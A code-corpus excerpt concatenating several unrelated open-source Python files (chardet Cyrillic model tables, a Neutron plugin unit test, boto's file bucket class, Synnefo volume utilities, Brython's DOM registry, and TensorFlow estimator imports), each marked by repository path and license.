9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16,
239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255,
)
# Model Table:
# total sequences: 100%
# first 512 sequences: 97.6601%
# first 1024 sequences: 2.3389%
# rest sequences: 0.1237%
# negative sequences: 0.0009%
RussianLangModel = (
0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,1,3,3,3,3,1,3,3,3,2,3,2,3,3,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,2,2,2,2,2,0,0,2,
3,3,3,2,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,2,3,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,2,2,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,2,3,3,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1,
0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1,
0,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,2,2,2,3,1,3,3,1,3,3,3,3,2,2,3,0,2,2,2,3,3,2,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,3,3,3,2,2,3,2,3,3,3,2,1,2,2,0,1,2,2,2,2,2,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,3,0,2,2,3,3,2,1,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,1,2,3,2,2,3,2,3,3,3,3,2,2,3,0,3,2,2,3,1,1,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,2,2,3,3,3,3,3,2,3,3,3,3,2,2,2,0,3,3,3,2,2,2,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,2,3,2,3,3,3,3,3,3,2,3,2,2,0,1,3,2,1,2,2,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,2,1,1,3,0,1,1,1,1,2,1,1,0,2,2,2,1,2,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,2,2,2,2,1,3,2,3,2,3,2,1,2,2,0,1,1,2,1,2,1,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,3,3,3,3,2,2,3,2,3,3,3,2,2,2,2,0,2,2,2,2,3,1,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,2,3,2,2,3,3,3,3,3,3,3,3,3,1,3,2,0,0,3,3,3,3,2,3,3,3,3,2,3,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,3,2,2,3,3,0,2,1,0,3,2,3,2,3,0,0,1,2,0,0,1,0,1,2,1,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,3,0,2,3,3,3,3,2,3,3,3,3,1,2,2,0,0,2,3,2,2,2,3,2,3,2,2,3,0,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,0,2,3,2,3,0,1,2,3,3,2,0,2,3,0,0,2,3,2,2,0,1,3,1,3,2,2,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,1,3,0,2,3,3,3,3,3,3,3,3,2,1,3,2,0,0,2,2,3,3,3,2,3,3,0,2,2,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,2,3,3,2,2,2,3,3,0,0,1,1,1,1,1,2,0,0,1,1,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,2,3,3,3,3,3,3,3,0,3,2,3,3,2,3,2,0,2,1,0,1,1,0,1,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,2,3,3,3,2,2,2,2,3,1,3,2,3,1,1,2,1,0,2,2,2,2,1,3,1,0,
0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
2,2,3,3,3,3,3,1,2,2,1,3,1,0,3,0,0,3,0,0,0,1,1,0,1,2,1,0,0,0,0,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,2,1,1,3,3,3,2,2,1,2,2,3,1,1,2,0,0,2,2,1,3,0,0,2,1,1,2,1,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,2,3,3,3,3,1,2,2,2,1,2,1,3,3,1,1,2,1,2,1,2,2,0,2,0,0,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,3,2,1,3,2,2,3,2,0,3,2,0,3,0,1,0,1,1,0,0,1,1,1,1,0,1,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,2,3,3,3,2,2,2,3,3,1,2,1,2,1,0,1,0,1,1,0,1,0,0,2,1,1,1,0,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,
3,1,1,2,1,2,3,3,2,2,1,2,2,3,0,2,1,0,0,2,2,3,2,1,2,2,2,2,2,3,1,0,
0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,1,1,0,1,1,2,2,1,1,3,0,0,1,3,1,1,1,0,0,0,1,0,1,1,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,1,3,3,3,2,0,0,0,2,1,0,1,0,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,0,1,0,0,2,3,2,2,2,1,2,2,2,1,2,1,0,0,1,1,1,0,2,0,1,1,1,0,0,1,1,
1,0,0,0,0,0,1,2,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,3,0,0,0,0,1,0,0,0,0,3,0,1,2,1,0,0,0,0,0,0,0,1,1,0,0,1,1,
1,0,1,0,1,2,0,0,1,1,2,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,1,0,0,1,1,0,
2,2,3,2,2,2,3,1,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,0,1,0,1,1,1,0,2,1,
1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,0,1,1,0,
3,3,3,2,2,2,2,3,2,2,1,1,2,2,2,2,1,1,3,1,2,1,2,0,0,1,1,0,1,0,2,1,
1,1,1,1,1,2,1,0,1,1,1,1,0,1,0,0,1,1,0,0,1,0,1,0,0,1,0,0,0,1,1,0,
2,0,0,1,0,3,2,2,2,2,1,2,1,2,1,2,0,0,0,2,1,2,2,1,1,2,2,0,1,1,0,2,
1,1,1,1,1,0,1,1,1,2,1,1,1,2,1,0,1,2,1,1,1,1,0,1,1,1,0,0,1,0,0,1,
1,3,2,2,2,1,1,1,2,3,0,0,0,0,2,0,2,2,1,0,0,0,0,0,0,1,0,0,0,0,1,1,
1,0,1,1,0,1,0,1,1,0,1,1,0,2,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,
2,3,2,3,2,1,2,2,2,2,1,0,0,0,2,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,2,1,
1,1,2,1,0,2,0,0,1,0,1,0,0,1,0,0,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0,
3,0,0,1,0,2,2,2,3,2,2,2,2,2,2,2,0,0,0,2,1,2,1,1,1,2,2,0,0,0,1,2,
1,1,1,1,1,0,1,2,1,1,1,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,1,1,1,0,0,1,
2,3,2,3,3,2,0,1,1,1,0,0,1,0,2,0,1,1,3,1,0,0,0,0,0,0,0,1,0,0,2,1,
1,1,1,1,1,1,1,0,1,0,1,1,1,1,0,1,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,0,
2,3,3,3,3,1,2,2,2,2,0,1,1,0,2,1,1,1,2,1,0,1,1,0,0,1,0,1,0,0,2,0,
0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,3,3,2,0,0,1,1,2,2,1,0,0,2,0,1,1,3,0,0,1,0,0,0,0,0,1,0,1,2,1,
1,1,2,0,1,1,1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,0,0,1,0,1,1,0,
1,3,2,3,2,1,0,0,2,2,2,0,1,0,2,0,1,1,1,0,1,0,0,0,3,0,1,1,0,0,2,1,
1,1,1,0,1,1,0,0,0,0,1,1,0,1,0,0,2,1,1,0,1,0,0,0,1,0,1,0,0,1,1,0,
3,1,2,1,1,2,2,2,2,2,2,1,2,2,1,1,0,0,0,2,2,2,0,0,0,1,2,1,0,1,0,1,
2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,2,1,1,1,0,1,0,1,1,0,1,1,1,0,0,1,
3,0,0,0,0,2,0,1,1,1,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,1,1,0,0,1,0,1,
1,1,0,0,1,0,0,0,1,0,1,1,0,0,1,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,1,
1,3,3,2,2,0,0,0,2,2,0,0,0,1,2,0,1,1,2,0,0,0,0,0,0,0,0,1,0,0,2,1,
0,1,1,0,0,1,1,0,0,0,1,1,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,
2,3,2,3,2,0,0,0,0,1,1,0,0,0,2,0,2,0,2,0,0,0,0,0,1,0,0,1,0,0,1,1,
1,1,2,0,1,2,1,0,1,1,2,1,1,1,1,1,2,1,1,0,1,0,0,1,1,1,1,1,0,1,1,0,
1,3,2,2,2,1,0,0,2,2,1,0,1,2,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,1,
0,0,1,1,0,1,1,0,0,1,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
1,0,0,1,0,2,3,1,2,2,2,2,2,2,1,1,0,0,0,1,0,1,0,2,1,1,1,0,0,0,0,1,
1,1,0,1,1,0,1,1,1,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,
2,0,2,0,0,1,0,3,2,1,2,1,2,2,0,1,0,0,0,2,1,0,0,2,1,1,1,1,0,2,0,2,
2,1,1,1,1,1,1,1,1,1,1,1,1,2,1,0,1,1,1,1,0,0,0,1,1,1,1,0,1,0,0,1,
1,2,2,2,2,1,0,0,1,0,0,0,0,0,2,0,1,1,1,1,0,0,0,0,1,0,1,2,0,0,2,0,
1,0,1,1,1,2,1,0,1,0,1,1,0,0,1,0,1,1,1,0,1,0,0,0,1,0,0,1,0,1,1,0,
2,1,2,2,2,0,3,0,1,1,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
0,0,0,1,1,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,
1,2,2,3,2,2,0,0,1,1,2,0,1,2,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,
0,1,1,0,0,1,1,0,0,1,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0,
2,2,1,1,2,1,2,2,2,2,2,1,2,2,0,1,0,0,0,1,2,2,2,1,2,1,1,1,1,1,2,1,
1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,1,
1,2,2,2,2,0,1,0,2,2,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,
0,0,1,0,0,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,0,0,2,2,2,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1,
0,1,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,2,0,0,0,0,1,0,0,1,1,2,0,0,0,0,1,0,1,0,0,1,0,0,2,0,0,0,1,
0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,
1,2,2,2,1,1,2,0,2,1,1,1,1,0,2,2,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,1,
0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
1,0,2,1,2,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0,
0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0,
1,0,0,0,0,2,0,1,2,1,0,1,1,1,0,1,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,1,
0,0,0,0,0,1,0,0,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,
2,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0,
2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,1,1,0,1,0,1,0,0,1,1,1,1,0,0,0,1,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0,
1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
1,1,0,1,1,0,1,0,1,0,0,0,0,1,1,0,1,1,0,0,0,0,0,1,0,1,1,0,1,0,0,0,
0,1,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,
)
Koi8rModel = {
'charToOrderMap': KOI8R_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "KOI8-R"
}
Win1251CyrillicModel = {
'charToOrderMap': win1251_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "windows-1251"
}
Latin5CyrillicModel = {
'charToOrderMap': latin5_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "ISO-8859-5"
}
MacCyrillicModel = {
'charToOrderMap': macCyrillic_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "MacCyrillic"
};
Ibm866Model = {
'charToOrderMap': IBM866_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "IBM866"
}
Ibm855Model = {
'charToOrderMap': IBM855_CharToOrderMap,
'precedenceMatrix': RussianLangModel,
'mTypicalPositiveRatio': 0.976601,
'keepEnglishLetter': False,
'charsetName': "IBM855"
}
# flake8: noqa
|
gpl-3.0
|
sasukeh/neutron
|
neutron/tests/unit/plugins/oneconvergence/test_plugin_helper.py
|
43
|
2504
|
# Copyright 2014 OneConvergence, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_serialization import jsonutils
import requests
from neutron.plugins.oneconvergence.lib import config # noqa
from neutron.plugins.oneconvergence.lib import plugin_helper as client
from neutron.tests import base
class TestPluginHelper(base.BaseTestCase):
def setUp(self):
super(TestPluginHelper, self).setUp()
self.nvsdcontroller = client.NVSDController()
def get_response(self, *args, **kwargs):
response = mock.Mock()
response.status_code = requests.codes.ok
response.content = jsonutils.dumps({'session_uuid': 'new_auth_token'})
return response
def test_login(self):
login_url = ('http://127.0.0.1:8082/pluginhandler/ocplugin/'
'authmgmt/login')
headers = {'Content-Type': 'application/json'}
data = jsonutils.dumps({"user_name": "ocplugin", "passwd": "oc123"})
timeout = 30.0
with mock.patch.object(self.nvsdcontroller.pool, 'request',
side_effect=self.get_response) as request:
self.nvsdcontroller.login()
request.assert_called_once_with('POST', url=login_url,
headers=headers, data=data,
timeout=timeout)
def test_request(self):
with mock.patch.object(self.nvsdcontroller.pool, 'request',
side_effect=self.get_response) as request:
self.nvsdcontroller.login()
self.nvsdcontroller.request("POST", "/some_url")
self.assertEqual(request.call_count, 2)
request.assert_called_with(
'POST',
url='http://127.0.0.1:8082/some_url?authToken=new_auth_token',
headers={'Content-Type': 'application/json'}, data='',
timeout=30.0)
|
apache-2.0
|
harshilasu/LinkurApp
|
y/google-cloud-sdk/platform/gsutil/third_party/boto/boto/file/bucket.py
|
97
|
4075
|
# Copyright 2010 Google Inc.
# Copyright (c) 2011, Nexenta Systems Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# File representation of bucket, for use with "file://" URIs.
import os
from key import Key
from boto.file.simpleresultset import SimpleResultSet
from boto.s3.bucketlistresultset import BucketListResultSet
class Bucket(object):
def __init__(self, name, contained_key):
"""Instantiate an anonymous file-based Bucket around a single key.
"""
self.name = name
self.contained_key = contained_key
def __iter__(self):
return iter(BucketListResultSet(self))
def __str__(self):
return 'anonymous bucket for file://' + self.contained_key
def delete_key(self, key_name, headers=None,
version_id=None, mfa_token=None):
"""
Deletes a key from the bucket.
:type key_name: string
:param key_name: The key name to delete
:type version_id: string
:param version_id: Unused in this subclass.
:type mfa_token: tuple or list of strings
:param mfa_token: Unused in this subclass.
"""
os.remove(key_name)
def get_all_keys(self, headers=None, **params):
"""
This method returns the single key around which this anonymous Bucket
was instantiated.
:rtype: SimpleResultSet
:return: The result from file system listing the keys requested
"""
key = Key(self.name, self.contained_key)
return SimpleResultSet([key])
def get_key(self, key_name, headers=None, version_id=None,
key_type=Key.KEY_REGULAR_FILE):
"""
Check to see if a particular key exists within the bucket.
Returns: An instance of a Key object or None
:type key_name: string
:param key_name: The name of the key to retrieve
:type version_id: string
:param version_id: Unused in this subclass.
:type stream_type: integer
:param stream_type: Type of the Key - Regular File or input/output Stream
:rtype: :class:`boto.file.key.Key`
:returns: A Key object from this bucket.
"""
if key_name == '-':
return Key(self.name, '-', key_type=Key.KEY_STREAM_READABLE)
else:
fp = open(key_name, 'rb')
return Key(self.name, key_name, fp)
def new_key(self, key_name=None, key_type=Key.KEY_REGULAR_FILE):
"""
Creates a new key
:type key_name: string
:param key_name: The name of the key to create
:rtype: :class:`boto.file.key.Key`
:returns: An instance of the newly created key object
"""
if key_name == '-':
return Key(self.name, '-', key_type=Key.KEY_STREAM_WRITABLE)
else:
dir_name = os.path.dirname(key_name)
if dir_name and not os.path.exists(dir_name):
os.makedirs(dir_name)
fp = open(key_name, 'wb')
return Key(self.name, key_name, fp)
|
gpl-3.0
|
apyrgio/synnefo
|
snf-cyclades-app/synnefo/volume/util.py
|
6
|
4183
|
# Copyright (C) 2010-2014 GRNET S.A.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from synnefo.db import models
from snf_django.lib.api import faults
from synnefo.api.util import get_image_dict, get_vm
from synnefo.plankton import backend
from synnefo.cyclades_settings import cyclades_services, BASE_HOST
from synnefo.lib import join_urls
from synnefo.lib.services import get_service_path
def get_volume(user_id, volume_id, for_update=False,
non_deleted=False,
exception=faults.ItemNotFound):
volumes = models.Volume.objects
if for_update:
volumes = volumes.select_for_update()
try:
volume_id = int(volume_id)
except (TypeError, ValueError):
raise faults.BadRequest("Invalid volume id: %s" % volume_id)
try:
volume = volumes.get(id=volume_id, userid=user_id)
if non_deleted and volume.deleted:
raise faults.BadRequest("Volume '%s' has been deleted."
% volume_id)
return volume
except models.Volume.DoesNotExist:
raise exception("Volume %s not found" % volume_id)
def get_volume_type(volume_type_id, for_update=False, include_deleted=False,
exception=faults.ItemNotFound):
vtypes = models.VolumeType.objects
if not include_deleted:
vtypes = vtypes.filter(deleted=False)
if for_update:
vtypes = vtypes.select_for_update()
try:
vtype_id = int(volume_type_id)
except (TypeError, ValueError):
raise faults.BadRequest("Invalid volume id: %s" % volume_type_id)
try:
return vtypes.get(id=vtype_id)
except models.VolumeType.DoesNotExist:
raise exception("Volume type %s not found" % vtype_id)
def get_snapshot(user_id, snapshot_id, exception=faults.ItemNotFound):
try:
with backend.PlanktonBackend(user_id) as b:
return b.get_snapshot(snapshot_id)
except faults.ItemNotFound:
raise exception("Snapshot %s not found" % snapshot_id)
def get_image(user_id, image_id, exception=faults.ItemNotFound):
try:
return get_image_dict(image_id, user_id)
except faults.ItemNotFound:
raise exception("Image %s not found" % image_id)
def get_server(user_id, server_id, for_update=False, non_deleted=False,
exception=faults.ItemNotFound):
try:
server_id = int(server_id)
except (TypeError, ValueError):
raise faults.BadRequest("Invalid server id: %s" % server_id)
try:
return get_vm(server_id, user_id, for_update=for_update,
non_deleted=non_deleted, non_suspended=True)
except faults.ItemNotFound:
raise exception("Server %s not found" % server_id)
VOLUME_URL = \
join_urls(BASE_HOST,
get_service_path(cyclades_services, "volume", version="v2.0"))
VOLUMES_URL = join_urls(VOLUME_URL, "volumes/")
SNAPSHOTS_URL = join_urls(VOLUME_URL, "snapshots/")
def volume_to_links(volume_id):
href = join_urls(VOLUMES_URL, str(volume_id))
return [{"rel": rel, "href": href} for rel in ("self", "bookmark")]
def snapshot_to_links(snapshot_id):
href = join_urls(SNAPSHOTS_URL, str(snapshot_id))
return [{"rel": rel, "href": href} for rel in ("self", "bookmark")]
def update_snapshot_state(snapshot_id, user_id, state):
"""Update the state of a snapshot in Pithos.
Use PithosBackend in order to update the state of the snapshots in
Pithos DB.
"""
with backend.PlanktonBackend(user_id) as b:
return b.update_snapshot_state(snapshot_id, state=state)
|
gpl-3.0
|
40223136/w17test2
|
static/Brython3.1.0-20150301-090019/Lib/xml/dom/domreg.py
|
841
|
3402
|
"""Registration facilities for DOM. This module should not be used
directly. Instead, the functions getDOMImplementation and
registerDOMImplementation should be imported from xml.dom."""
# This is a list of well-known implementations. Well-known names
# should be published by posting to [email protected], and are
# subsequently recorded in this file.
well_known_implementations = {
'minidom':'xml.dom.minidom',
'4DOM': 'xml.dom.DOMImplementation',
}
# DOM implementations not officially registered should register
# themselves with their
registered = {}
def registerDOMImplementation(name, factory):
"""registerDOMImplementation(name, factory)
Register the factory function with the name. The factory function
should return an object which implements the DOMImplementation
interface. The factory function can either return the same object,
or a new one (e.g. if that implementation supports some
customization)."""
registered[name] = factory
def _good_enough(dom, features):
"_good_enough(dom, features) -> Return 1 if the dom offers the features"
for f,v in features:
if not dom.hasFeature(f,v):
return 0
return 1
def getDOMImplementation(name=None, features=()):
"""getDOMImplementation(name = None, features = ()) -> DOM implementation.
Return a suitable DOM implementation. The name is either
well-known, the module name of a DOM implementation, or None. If
it is not None, imports the corresponding module and returns
DOMImplementation object if the import succeeds.
If name is not given, consider the available implementations to
find one with the required feature set. If no implementation can
be found, raise an ImportError. The features list must be a sequence
of (feature, version) pairs which are passed to hasFeature."""
import os
creator = None
mod = well_known_implementations.get(name)
if mod:
mod = __import__(mod, {}, {}, ['getDOMImplementation'])
return mod.getDOMImplementation()
elif name:
return registered[name]()
elif "PYTHON_DOM" in os.environ:
return getDOMImplementation(name = os.environ["PYTHON_DOM"])
# User did not specify a name, try implementations in arbitrary
# order, returning the one that has the required features
if isinstance(features, str):
features = _parse_feature_string(features)
for creator in registered.values():
dom = creator()
if _good_enough(dom, features):
return dom
for creator in well_known_implementations.keys():
try:
dom = getDOMImplementation(name = creator)
except Exception: # typically ImportError, or AttributeError
continue
if _good_enough(dom, features):
return dom
raise ImportError("no suitable DOM implementation found")
def _parse_feature_string(s):
features = []
parts = s.split()
i = 0
length = len(parts)
while i < length:
feature = parts[i]
if feature[0] in "0123456789":
raise ValueError("bad feature name: %r" % (feature,))
i = i + 1
version = None
if i < length:
v = parts[i]
if v[0] in "0123456789":
i = i + 1
version = v
features.append((feature, version))
return tuple(features)
|
gpl-3.0
|
horance-liu/tensorflow
|
tensorflow/python/estimator/estimator_lib.py
|
13
|
3243
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Estimator: High level tools for working with models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,line-too-long,wildcard-import
from tensorflow.python.estimator.canned.baseline import BaselineClassifier
from tensorflow.python.estimator.canned.baseline import BaselineRegressor
from tensorflow.python.estimator.canned.dnn import DNNClassifier
from tensorflow.python.estimator.canned.dnn import DNNRegressor
from tensorflow.python.estimator.canned.dnn_linear_combined import DNNLinearCombinedClassifier
